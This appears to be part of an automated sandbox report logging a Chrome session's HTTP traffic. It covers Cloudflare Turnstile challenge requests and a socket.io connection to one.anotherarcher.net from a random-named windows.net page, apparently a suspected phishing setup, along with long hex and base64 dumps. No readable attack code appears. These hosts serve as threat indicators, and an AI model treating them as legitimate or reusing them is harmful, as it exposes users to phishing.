                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC1369INData Raw: 72 70 6d 75 68 6a 6e 74 6e 67 5a 43 79 67 4b 65 66 70 36 32 6c 73 4a 79 49 65 6e 32 32 6a 61 4b 73 65 37 53 66 70 4c 36 37 6f 70 79 44 6c 71 32 34 78 70 32 79 72 6f 76 45 72 63 37 4f 79 37 47 4d 6b 36 61 39 33 4e 61 74 77 71 36 62 31 4c 32 6a 33 74 76 42 35 4f 61 6d 78 38 61 34 35 75 4b 70 30 65 2f 72 39 64 54 79 79 64 54 47 35 76 62 61 79 65 38 42 31 64 4f 2b 38 66 6a 53 35 65 66 49 34 63 76 58 79 4e 2f 62 36 73 33 68 37 41 44 74 31 50 58 53 31 76 76 6e 43 50 45 52 39 42 72 76 34 67 51 42 45 78 30 53 49 41 6e 32 42 69 34 58 43 51 63 73 41 50 41 70 4b 50 59 6d 4d 67 34 61 43 41 6f 47 4f 52 67 4a 47 67 38 43 51 77 55 6d 41 6a 5a 41 47 51 6f 6a 4b 69 77 4b 42 78 6f 66 45 6c 41 56 4e 68 4a 46 55 43 6b 61 4e 44 6f 38 47 69 45 55 4d 6d 51 33 49 30 4e 48 58 47
                                                                                                                                                                                                                                Data Ascii: rpmuhjntngZCygKefp62lsJyIen22jaKse7SfpL67opyDlq24xp2yrovErc7Oy7GMk6a93Natwq6b1L2j3tvB5Oamx8a45uKp0e/r9dTyydTG5vbaye8B1dO+8fjS5efI4cvXyN/b6s3h7ADt1PXS1vvnCPER9Brv4gQBEx0SIAn2Bi4XCQcsAPApKPYmMg4aCAoGORgJGg8CQwUmAjZAGQojKiwKBxofElAVNhJFUCkaNDo8GiEUMmQ3I0NHXG
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC1369INData Raw: 69 59 65 45 72 35 43 71 6c 48 57 58 6f 34 79 52 70 70 4b 63 71 4b 36 5a 6e 4c 6d 52 74 73 4c 47 79 4a 62 4c 76 73 69 38 76 70 6d 63 71 6f 2b 73 72 61 54 54 32 63 79 58 78 64 4f 77 78 72 53 59 76 36 4b 33 76 61 47 65 34 37 6e 68 75 73 6d 37 78 4c 66 74 30 65 58 46 35 4b 37 41 77 4c 54 6e 35 2f 66 61 36 63 37 47 36 65 43 33 38 4e 61 2b 35 50 72 6b 78 65 6e 68 33 4f 48 32 41 65 7a 34 2f 66 50 6b 45 50 44 73 39 4e 58 33 45 4f 7a 78 42 74 6e 38 43 51 34 65 39 43 41 42 38 41 58 6c 43 4f 54 38 41 68 59 6c 44 52 6b 65 38 67 55 77 45 4f 38 56 39 52 6b 4f 44 52 49 6d 4b 52 30 70 4c 78 77 56 51 43 41 37 4a 51 59 6e 4c 43 55 59 49 6a 31 45 4a 53 49 79 51 42 49 76 4a 45 67 68 51 79 73 54 58 69 64 51 48 46 52 42 54 78 5a 45 58 46 39 44 57 6a 74 4a 58 46 78 6d 59 53 39
                                                                                                                                                                                                                                Data Ascii: iYeEr5CqlHWXo4yRppKcqK6ZnLmRtsLGyJbLvsi8vpmcqo+sraTT2cyXxdOwxrSYv6K3vaGe47nhusm7xLft0eXF5K7AwLTn5/fa6c7G6eC38Na+5Prkxenh3OH2Aez4/fPkEPDs9NX3EOzxBtn8CQ4e9CAB8AXlCOT8AhYlDRke8gUwEO8V9RkODRImKR0pLxwVQCA7JQYnLCUYIj1EJSIyQBIvJEghQysTXidQHFRBTxZEXF9DWjtJXFxmYS9
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC1369INData Raw: 36 4f 73 64 48 74 36 76 61 65 53 6b 4c 47 65 72 73 4f 2f 75 72 36 65 6f 61 47 4a 68 38 69 4f 69 71 36 48 7a 4e 4b 52 6e 63 53 6a 6f 49 2f 57 72 4d 79 30 6d 4a 58 68 76 70 36 7a 34 4a 2b 34 76 73 6e 46 77 4b 50 42 78 2b 71 76 78 37 33 49 71 38 6e 7a 38 61 37 32 77 39 48 59 32 74 61 35 36 72 7a 39 30 37 58 6a 33 39 54 61 34 50 62 43 43 38 62 31 32 76 73 50 38 4d 7a 52 38 2b 2f 6b 42 78 55 45 44 66 50 63 2f 4f 6e 77 33 52 51 62 45 67 4d 50 4a 69 49 58 43 52 2f 6e 47 66 59 4e 2f 51 34 41 41 4f 76 6d 4b 43 6f 77 4f 53 6e 34 48 52 51 55 50 51 6e 79 49 67 4d 30 42 42 41 51 42 78 52 43 47 44 63 74 42 30 64 4a 50 54 4d 75 4b 7a 49 65 56 30 38 72 4d 55 39 58 47 31 77 33 51 46 52 5a 48 69 46 68 59 45 42 49 49 6c 55 70 4b 56 63 38 53 55 6c 53 58 7a 46 63 55 47 52 73
                                                                                                                                                                                                                                Data Ascii: 6OsdHt6vaeSkLGersO/ur6eoaGJh8iOiq6HzNKRncSjoI/WrMy0mJXhvp6z4J+4vsnFwKPBx+qvx73Iq8nz8a72w9HY2ta56rz907Xj39Ta4PbCC8b12vsP8MzR8+/kBxUEDfPc/Onw3RQbEgMPJiIXCR/nGfYN/Q4AAOvmKCowOSn4HRQUPQnyIgM0BBAQBxRCGDctB0dJPTMuKzIeV08rMU9XG1w3QFRZHiFhYEBIIlUpKVc8SUlSXzFcUGRs
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC1369INData Raw: 47 49 6f 4b 4b 30 6f 61 2b 79 6a 38 57 78 6e 62 2b 34 70 35 6d 2f 6f 4d 43 76 78 35 48 4b 73 71 57 53 6f 4b 54 56 6f 36 2f 48 6d 72 79 61 75 37 36 74 30 61 36 33 30 4e 37 4a 75 4d 72 63 31 61 44 46 34 64 36 74 77 4d 76 68 72 4d 7a 4f 38 50 44 49 39 4c 72 55 2f 74 6e 2b 76 77 54 67 30 76 50 30 31 65 44 69 78 75 54 6f 37 73 58 6b 33 42 48 38 41 78 50 6c 79 63 72 56 39 78 6b 4a 35 2b 66 36 33 2f 50 68 45 64 33 58 35 52 6b 58 46 69 51 6f 43 53 38 6e 37 43 77 4e 48 2f 45 55 49 67 6b 79 41 68 45 34 4f 43 63 59 39 77 34 36 47 7a 2f 36 44 54 63 62 50 68 6f 61 47 6a 5a 48 52 79 6c 4a 54 44 4a 41 44 42 49 76 4a 69 34 5a 53 68 55 75 4c 43 64 56 54 43 74 53 50 78 30 2f 4c 6a 59 69 4b 56 34 69 49 30 6c 70 5a 57 4e 4e 51 31 73 6d 55 33 4e 74 62 33 68 70 61 55 70 4e 53
                                                                                                                                                                                                                                Data Ascii: GIoKK0oa+yj8Wxnb+4p5m/oMCvx5HKsqWSoKTVo6/Hmryau76t0a630N7JuMrc1aDF4d6twMvhrMzO8PDI9LrU/tn+vwTg0vP01eDixuTo7sXk3BH8AxPlycrV9xkJ5+f63/PhEd3X5RkXFiQoCS8n7CwNH/EUIgkyAhE4OCcY9w46Gz/6DTcbPhoaGjZHRylJTDJADBIvJi4ZShUuLCdVTCtSPx0/LjYiKV4iI0lpZWNNQ1smU3Ntb3hpaUpNS
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC1369INData Raw: 67 6c 4c 36 43 6c 61 65 34 68 73 54 4d 69 62 79 6c 77 4d 4f 6b 72 4c 43 76 70 71 75 53 78 36 6e 57 33 35 7a 55 76 74 6e 63 32 39 37 55 6f 39 33 6e 31 64 57 69 31 74 7a 69 38 4b 66 48 39 4b 79 77 39 75 72 56 74 2b 6e 76 36 4d 75 36 74 2b 6d 35 31 37 37 63 31 39 33 35 41 73 50 6a 2f 73 59 4f 31 2f 6a 69 7a 51 2f 4f 34 75 76 71 47 52 6f 62 37 74 6a 7a 36 74 51 65 32 65 2f 2b 39 77 41 6a 42 53 67 44 49 76 51 63 46 69 6b 41 47 4f 7a 70 4d 53 59 79 4a 41 41 68 4c 51 77 75 4e 68 4d 33 4f 54 50 38 49 76 31 41 4c 7a 58 38 47 51 67 70 46 7a 63 6d 50 54 78 44 4b 51 67 72 48 52 55 73 52 43 6b 76 55 43 35 4c 55 6c 63 58 47 54 6f 68 47 30 77 31 58 57 42 6e 52 6a 6b 6a 49 7a 35 6b 4b 55 4a 52 61 47 4e 47 59 48 4a 76 51 6e 6f 79 55 31 42 30 65 6d 32 42 51 46 68 50 64 6c
                                                                                                                                                                                                                                Data Ascii: glL6Clae4hsTMibylwMOkrLCvpquSx6nW35zUvtnc297Uo93n1dWi1tzi8KfH9Kyw9urVt+nv6Mu6t+m5177c1935AsPj/sYO1/jizQ/O4uvqGRob7tjz6tQe2e/+9wAjBSgDIvQcFikAGOzpMSYyJAAhLQwuNhM3OTP8Iv1ALzX8GQgpFzcmPTxDKQgrHRUsRCkvUC5LUlcXGTohG0w1XWBnRjkjIz5kKUJRaGNGYHJvQnoyU1B0em2BQFhPdl


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                118192.168.2.449878104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/223406031:1727987438:Xv_Al2IpeM4HkywcXvVtjay6EDDaGmub-i6LKQI9Wig/8ccfd82849af42f2/57d4757eac0388b HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC349INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:33 GMT
                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                Content-Length: 7
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                cf-chl-out: j5aJigAry4BIKvd3u21nR/+Sxq4Mrtd+zd4=$R5dWOisQ3tzqAo52
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd860cd2a32fa-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                Data Ascii: invalid


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                119192.168.2.44987979.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC643OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB6_F HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:33 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:33 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 6e 66 42 77 49 32 43 37 57 6b 6d 6a 69 44 35 4e 41 41 4e 64 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"nfBwI2C7WkmjiD5NAANd","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                120192.168.2.449880104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC925OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/520840529:1727987471:dZM8UV-JAT2hGcuf3zG_cR0GPG48srOyHscTUzuMey8/8ccfd84d0859428f/2b545705cb2f7d9 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 3109
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 2b545705cb2f7d9
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/86ghn/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC3109OUTData Raw: 76 5f 38 63 63 66 64 38 34 64 30 38 35 39 34 32 38 66 3d 6b 6f 74 57 41 57 49 57 6f 57 76 57 48 46 53 6c 46 53 30 57 46 75 2d 4a 38 64 46 39 53 38 53 42 67 75 6e 6a 78 53 43 33 59 53 78 78 46 6d 53 56 53 34 75 39 4a 37 78 68 50 32 53 6b 57 33 4a 53 68 36 37 38 78 53 63 53 6d 78 2d 67 41 77 76 75 65 53 6b 53 53 65 6f 53 56 57 53 6f 37 53 50 57 49 67 53 71 57 38 36 6d 36 70 4a 57 64 57 79 53 6b 78 2d 7a 52 67 4a 68 6f 53 4b 53 38 61 7a 70 55 69 67 35 52 30 44 41 6c 24 78 2d 42 50 46 53 50 76 53 5a 74 6a 76 53 46 6a 4d 24 55 6a 64 61 33 30 25 32 62 63 48 6a 6e 53 46 43 36 57 2d 46 2d 53 57 54 6e 53 53 42 43 53 2d 68 79 78 53 68 4a 6d 76 57 53 33 6f 53 47 79 75 6f 54 61 56 79 7a 38 78 53 4d 57 50 63 53 2d 7a 31 53 38 7a 6b 42 78 2d 79 53 50 6f 66 53 6e 65 4d
                                                                                                                                                                                                                                Data Ascii: v_8ccfd84d0859428f=kotWAWIWoWvWHFSlFS0WFu-J8dF9S8SBgunjxSC3YSxxFmSVS4u9J7xhP2SkW3JSh678xScSmx-gAwvueSkSSeoSVWSo7SPWIgSqW86m6pJWdWySkx-zRgJhoSKS8azpUig5R0DAl$x-BPFSPvSZtjvSFjM$Ujda30%2bcHjnSFC6W-F-SWTnSSBCS-hyxShJmvWS3oSGyuoTaVyz8xSMWPcS-z1S8zkBx-ySPofSneM
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC737INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:34 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 162776
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: 4LXpjJw32qWbg7NRkvctb6xB8bfgiEj0h6IzSk7WFT5Ji7z7M26td7YolGZL0jblIgpOXcJvm/dn9CUvcncE1FYGEJXwx58+olxZC+EbH9H8S8UJirt/s/gPtrJcIFQMb/+VV+hI6S2DRY5RaxGl7APWBvFtm0/+r/XyjCkIoPbFqkYcDlqRse5Dd/Rx/SIBu+lj2EuriTtB84rwLLDxhd6GtQ5XSw1DLHEJwpKex2C4RLoH/Ywkb9PmfYoMGNOe5z0wd1bdASRrdCEtU5L/ji8jlJD2NHUpUPPXC++u+nhatI3ER+6KmJUDGusWe3GegBRc6rvApmStAsYM8PhRWlLPnhfELYw2g0673PXHuG9OGCi5N/AyEOkMQ6hD4XMDkoOnErVmo32301i0E6gaMiyNVQBxoPs9HD7nTbkVAj0P87p/YSnTeK0ZQe+EZ4jCZyXr30xEenLy944cGY2sUTNPHwWWBBTNzt46V4IPXkNzyi3UZ3gnazgReSp+ApFmaA==$I09bv5TDYe1DGtt3
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd8653e3742b0-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC632INData Raw: 74 4a 65 50 74 59 6d 54 75 5a 44 44 72 35 64 33 66 70 43 43 68 70 61 36 6e 4a 79 6b 72 73 4b 71 73 36 50 4c 7a 63 37 42 72 36 48 56 31 61 72 55 30 39 69 74 6f 64 62 57 72 64 37 51 78 74 37 53 31 4e 69 72 35 65 2b 36 72 39 71 37 34 38 53 6e 77 66 4b 76 74 72 62 6d 74 76 65 37 76 74 2f 61 30 50 33 36 42 63 4d 45 42 39 4c 47 2b 64 73 43 7a 63 45 4b 79 38 77 51 45 39 58 52 34 74 50 72 34 78 33 58 37 2b 76 34 37 4e 50 74 45 39 73 48 2b 68 45 6f 49 68 77 49 44 75 59 4a 4a 65 38 48 49 43 59 70 49 53 51 4b 4d 54 59 30 2b 54 55 36 4f 53 67 78 4e 68 59 35 44 6b 55 50 42 54 59 4a 47 54 34 36 53 45 63 4c 51 44 34 30 54 44 42 4c 4b 68 64 54 54 43 6c 62 57 30 30 75 54 31 74 6a 4d 47 4e 46 50 6a 30 69 49 47 42 62 5a 6d 30 39 54 30 39 64 4c 57 45 6d 59 47 70 33 51 30 64
                                                                                                                                                                                                                                Data Ascii: tJePtYmTuZDDr5d3fpCChpa6nJykrsKqs6PLzc7Br6HV1arU09itodbWrd7Qxt7S1Nir5e+6r9q748SnwfKvtrbmtve7vt/a0P36BcMEB9LG+dsCzcEKy8wQE9XR4tPr4x3X7+v47NPtE9sH+hEoIhwIDuYJJe8HICYpISQKMTY0+TU6OSgxNhY5DkUPBTYJGT46SEcLQD40TDBLKhdTTClbW00uT1tjMGNFPj0iIGBbZm09T09dLWEmYGp3Q0d
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC1369INData Raw: 62 58 68 78 68 59 4f 61 57 58 53 4c 62 56 2b 64 58 4a 32 6b 66 47 43 45 70 49 61 6f 6e 61 4b 6f 6e 34 43 77 66 61 4b 6e 67 33 35 6f 71 4c 53 72 63 6f 2b 32 6c 61 6d 30 65 5a 2b 77 6a 4a 71 46 77 4a 36 2b 6c 34 4f 59 6c 5a 71 6e 72 49 61 63 68 4d 61 39 76 71 72 58 74 72 65 59 30 5a 75 6e 32 61 37 4f 6e 4a 7a 5a 76 4c 48 66 30 62 6e 43 74 4f 53 69 72 63 44 74 32 4d 33 79 76 65 61 2f 30 76 44 32 79 2b 4c 59 74 74 4b 31 74 74 62 58 39 2f 6e 35 77 2f 7a 30 41 4e 59 4c 79 50 51 44 2f 51 33 35 2b 68 50 2b 46 4d 34 50 46 78 44 55 43 65 63 4a 2f 42 6a 31 2b 75 30 53 37 79 4c 34 48 2f 33 78 4b 42 76 33 34 69 73 6d 42 75 67 63 4a 41 41 4e 41 53 30 4f 4b 2f 51 70 43 43 73 7a 4f 42 59 63 4e 44 49 51 52 43 38 2f 48 68 67 55 4f 30 63 35 4f 55 5a 4d 41 30 77 76 4c 68 30
                                                                                                                                                                                                                                Data Ascii: bXhxhYOaWXSLbV+dXJ2kfGCEpIaonaKon4CwfaKng35oqLSrco+2lam0eZ+wjJqFwJ6+l4OYlZqnrIachMa9vqrXtreY0Zun2a7OnJzZvLHf0bnCtOSircDt2M3yvea/0vD2y+LYttK1ttbX9/n5w/z0ANYLyPQD/Q35+hP+FM4PFxDUCecJ/Bj1+u0S7yL4H/3xKBv34ismBugcJAANAS0OK/QpCCszOBYcNDIQRC8/HhgUO0c5OUZMA0wvLh0
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC1369INData Raw: 4a 43 58 58 48 4b 4d 62 6e 52 74 70 4b 52 36 64 33 4e 2b 67 49 4f 47 72 4a 68 2b 65 62 43 6d 66 35 2b 71 68 49 68 31 6b 36 36 70 72 36 79 52 73 4c 70 2b 69 35 71 53 6f 61 50 49 76 6f 69 42 66 70 36 6d 72 61 4c 4e 76 4a 48 49 72 4b 2b 53 72 35 6e 59 30 4c 54 46 75 39 57 30 32 74 43 39 72 72 65 2b 33 64 4c 6d 78 38 58 73 75 64 66 6c 36 75 4c 45 7a 65 53 39 38 4d 66 51 32 73 7a 37 79 4e 72 63 30 65 6a 34 38 67 54 36 37 39 41 43 78 76 49 41 37 4e 72 49 44 4f 67 4c 38 4f 55 4b 43 67 34 47 31 77 2f 31 42 76 54 33 45 66 37 33 2b 78 54 69 38 77 50 64 49 78 50 67 45 79 55 6d 36 68 77 4f 4a 4f 30 48 41 78 41 51 4d 50 45 4b 4b 50 55 56 44 41 59 73 2f 42 49 62 4e 52 34 55 48 79 49 45 47 68 6b 56 49 7a 73 46 4c 41 74 49 42 30 74 48 4b 6b 51 78 51 30 45 59 4e 68 56 4a
                                                                                                                                                                                                                                Data Ascii: JCXXHKMbnRtpKR6d3N+gIOGrJh+ebCmf5+qhIh1k66pr6yRsLp+i5qSoaPIvoiBfp6mraLNvJHIrK+Sr5nY0LTFu9W02tC9rre+3dLmx8Xsudfl6uLEzeS98MfQ2sz7yNrc0ej48gT679ACxvIA7NrIDOgL8OUKCg4G1w/1BvT3Ef73+xTi8wPdIxPgEyUm6hwOJO0HAxAQMPEKKPUVDAYs/BIbNR4UHyIEGhkVIzsFLAtIB0tHKkQxQ0EYNhVJ
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC1369INData Raw: 79 44 68 58 64 64 59 59 43 5a 6c 49 70 6f 6e 61 53 69 6d 61 71 44 73 59 75 75 70 4b 47 6d 64 59 57 62 6a 33 71 30 72 33 71 43 6c 62 43 54 73 63 53 52 68 4b 47 57 74 70 37 4e 75 4b 79 65 6d 37 79 76 79 4b 2b 30 74 73 7a 4e 73 72 6d 71 30 63 79 76 76 71 4c 4d 77 74 69 2f 79 4d 62 63 78 39 72 4a 75 75 48 59 7a 75 69 36 76 4f 6e 7a 72 4d 79 76 74 50 48 4d 72 75 72 31 79 73 7a 62 38 2f 66 58 37 62 7a 6f 31 38 48 64 77 77 59 47 78 73 7a 73 35 64 34 4a 78 67 55 4e 34 39 63 55 48 42 66 61 46 64 55 49 47 68 7a 65 45 78 59 56 35 69 67 54 43 39 77 42 49 4f 63 4f 48 65 62 71 44 53 67 65 38 44 49 51 47 53 30 51 50 52 6f 78 4e 6a 41 67 44 78 51 66 4e 42 4d 65 53 51 64 4b 4b 69 6b 6b 50 67 6b 5a 48 67 34 54 53 43 35 50 4e 51 39 49 57 44 42 64 56 46 63 74 58 56 45 66 58
                                                                                                                                                                                                                                Data Ascii: yDhXddYYCZlIponaSimaqDsYuupKGmdYWbj3q0r3qClbCTscSRhKGWtp7NuKyem7yvyK+0tszNsrmq0cyvvqLMwti/yMbcx9rJuuHYzui6vOnzrMyvtPHMrur1yszb8/fX7bzo18HdwwYGxszs5d4JxgUN49cUHBfaFdUIGhzeExYV5igTC9wBIOcOHebqDSge8DIQGS0QPRoxNjAgDxQfNBMeSQdKKikkPgkZHg4TSC5PNQ9IWDBdVFctXVEfX
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC1369INData Raw: 72 70 6d 75 68 6a 6e 74 6e 67 5a 43 79 67 4b 65 66 70 36 32 6c 73 4a 79 49 65 6e 32 32 6a 61 4b 73 65 37 53 66 70 4c 36 37 6f 70 79 44 6c 71 32 34 78 70 32 79 72 6f 76 45 72 63 37 4f 79 37 47 4d 6b 36 61 39 33 4e 61 74 77 71 36 62 31 4c 32 6a 33 74 76 42 35 4f 61 6d 78 38 61 34 35 75 4b 70 30 65 2f 72 39 64 54 79 79 64 54 47 35 76 62 61 79 65 38 42 31 64 4f 2b 38 66 6a 53 35 65 66 49 34 63 76 58 79 4e 2f 62 36 73 33 68 37 41 44 74 31 50 58 53 31 76 76 6e 43 50 45 52 39 42 72 76 34 67 51 42 45 78 30 53 49 41 6e 32 42 69 34 58 43 51 63 73 41 50 41 70 4b 50 59 6d 4d 67 34 61 43 41 6f 47 4f 52 67 4a 47 67 38 43 51 77 55 6d 41 6a 5a 41 47 51 6f 6a 4b 69 77 4b 42 78 6f 66 45 6c 41 56 4e 68 4a 46 55 43 6b 61 4e 44 6f 38 47 69 45 55 4d 6d 51 33 49 30 4e 48 58 47
                                                                                                                                                                                                                                Data Ascii: rpmuhjntngZCygKefp62lsJyIen22jaKse7SfpL67opyDlq24xp2yrovErc7Oy7GMk6a93Natwq6b1L2j3tvB5Oamx8a45uKp0e/r9dTyydTG5vbaye8B1dO+8fjS5efI4cvXyN/b6s3h7ADt1PXS1vvnCPER9Brv4gQBEx0SIAn2Bi4XCQcsAPApKPYmMg4aCAoGORgJGg8CQwUmAjZAGQojKiwKBxofElAVNhJFUCkaNDo8GiEUMmQ3I0NHXG
                                                                                                                                                                                                                                2024-10-03 20:57:34 UTC1369INData Raw: 69 59 65 45 72 35 43 71 6c 48 57 58 6f 34 79 52 70 70 4b 63 71 4b 36 5a 6e 4c 6d 52 74 73 4c 47 79 4a 62 4c 76 73 69 38 76 70 6d 63 71 6f 2b 73 72 61 54 54 32 63 79 58 78 64 4f 77 78 72 53 59 76 36 4b 33 76 61 47 65 34 37 6e 68 75 73 6d 37 78 4c 66 74 30 65 58 46 35 4b 37 41 77 4c 54 6e 35 2f 66 61 36 63 37 47 36 65 43 33 38 4e 61 2b 35 50 72 6b 78 65 6e 68 33 4f 48 32 41 65 7a 34 2f 66 50 6b 45 50 44 73 39 4e 58 33 45 4f 7a 78 42 74 6e 38 43 51 34 65 39 43 41 42 38 41 58 6c 43 4f 54 38 41 68 59 6c 44 52 6b 65 38 67 55 77 45 4f 38 56 39 52 6b 4f 44 52 49 6d 4b 52 30 70 4c 78 77 56 51 43 41 37 4a 51 59 6e 4c 43 55 59 49 6a 31 45 4a 53 49 79 51 42 49 76 4a 45 67 68 51 79 73 54 58 69 64 51 48 46 52 42 54 78 5a 45 58 46 39 44 57 6a 74 4a 58 46 78 6d 59 53 39
                                                                                                                                                                                                                                Data Ascii: iYeEr5CqlHWXo4yRppKcqK6ZnLmRtsLGyJbLvsi8vpmcqo+sraTT2cyXxdOwxrSYv6K3vaGe47nhusm7xLft0eXF5K7AwLTn5/fa6c7G6eC38Na+5Prkxenh3OH2Aez4/fPkEPDs9NX3EOzxBtn8CQ4e9CAB8AXlCOT8AhYlDRke8gUwEO8V9RkODRImKR0pLxwVQCA7JQYnLCUYIj1EJSIyQBIvJEghQysTXidQHFRBTxZEXF9DWjtJXFxmYS9
